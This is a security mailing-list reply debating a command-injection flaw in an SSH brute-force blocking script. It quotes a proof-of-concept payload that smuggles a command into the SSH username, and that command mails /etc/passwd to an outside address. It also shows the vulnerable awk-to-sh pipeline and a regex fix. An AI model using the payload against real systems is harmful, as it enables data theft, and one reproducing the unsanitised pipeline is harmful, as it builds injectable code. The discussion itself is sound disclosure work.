Re: [Full-disclosure] SSH brute force blocking tool

Tavis Ormandy wrote:

However, it is certainly possible. Here is an example.

#!/bin/sh
command='$(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@xxxxxxxxxxxxxxxxx)<${x}etc${x}passwd)'
ssh -o "BatchMode yes" "a a $command"@$1

Which produces log entries like this:
Nov 28 15:14:15 insomniac sshd[5897]: pam_succeed_if(sshd:auth): error retrieving information about user a a $(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@xxxxxxxxxxxxxxxxx)<${x}etc${x}passwd)
Nov 28 15:14:15 insomniac sshd[5897]: Failed password for invalid user a a $(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@xxxxxxxxxxxxxxxxx)<${x}etc${x}passwd) from 127.0.0.1 port 47403 ssh2

Note that the 13th field both contains a dot and is entirely controlled
by me. This string is placed in /etc/hosts.deny by the script after
executed by cron.

The $1 in the awk script below is the entire string, which is piped
unsanitised into /bin/sh:

awk '!/#/ && /\./ && !a[$0]++
{print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22
-j REJECT"}' /etc/hosts.deny |\
awk '/iptables/ && !/#/ && !/-s -i/'|sh

The results are obvious.

Incorrect did you look at the fix? It isn't unsanitized as you state:

Firstly data being passed is not coming through via /var/log/secure or /var/log/auth* its coming in via /etc/hosts.deny

function IPT {

grep -E '(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}' /etc/hosts.deny|\
sed 's/::ffff://g'|\
awk '!/#/&&/\./&&!a[$0]++
{print "iptables -A INPUT -s "$1" -i eth0 -d 208.51.101.194 -p TCP --dport 22 -j REJECT"}'|\
awk '/iptables/&&!/#/&&!/-s -i/'|sh

}

[root@voip2 ~]# cat testing.deny
89.96.238.226
219.146.59.225
211.97.194.148
220.110.34.44
2383274298734
sakjdhasiuwe
hacker
aaa
bbb
ccc
0wn3d
[root@voip2 ~]# grep -E '(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}' testing.deny
89.96.238.226
219.146.59.225
211.97.194.148
220.110.34.44

So the buck stops there before it is put into the shell.



--
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages

  • Re: Code to check if a valid e-mail address was entered
    ... Function Valid_Email(E_Address As String) As Boolean ... ' Note that the part after the @ sign must contain at least one dot, ... ' at least one other character following it, ... Dim TString As String ...
    (microsoft.public.access.modulesdaovba)
  • Re: List files containing a string..
    ... Er, the question was about files containing a string, not about file ... got were responses like man grep, ... What is not readily apparent in the xargs man page is that it ... that is the standard one on FreeBSD has a -r/-R option and even ...
    (comp.unix.bsd.freebsd.misc)
  • Re: Numeric valication
    ... it accepts any string EITHER ... followed by a digit AND followed by a dot which might not be ... So to further my knowledge of regexps, I will study your examples further. ...
    (microsoft.public.scripting.jscript)
  • Re: Simplified TimeZone
    ... reflection shows that the TimeZone ... String abbr = tz.getDisplayName; ... private static void printTzParams { ... home dot woh dot rr dot com slash jbmatthews ...
    (comp.lang.java.programmer)
  • Re: preg_split problem
    ... To do that i need to split them whenever a dot occurs, and the join the first two array occurences in a new string but I have a problem beacuse the dot in the Croatian languages is not always used a sentence delimiter, but is often used in conjuction with numbers and acronyms. ... Formulating the exact requirements before writing the regex is more then half the work. ...
    (comp.lang.php)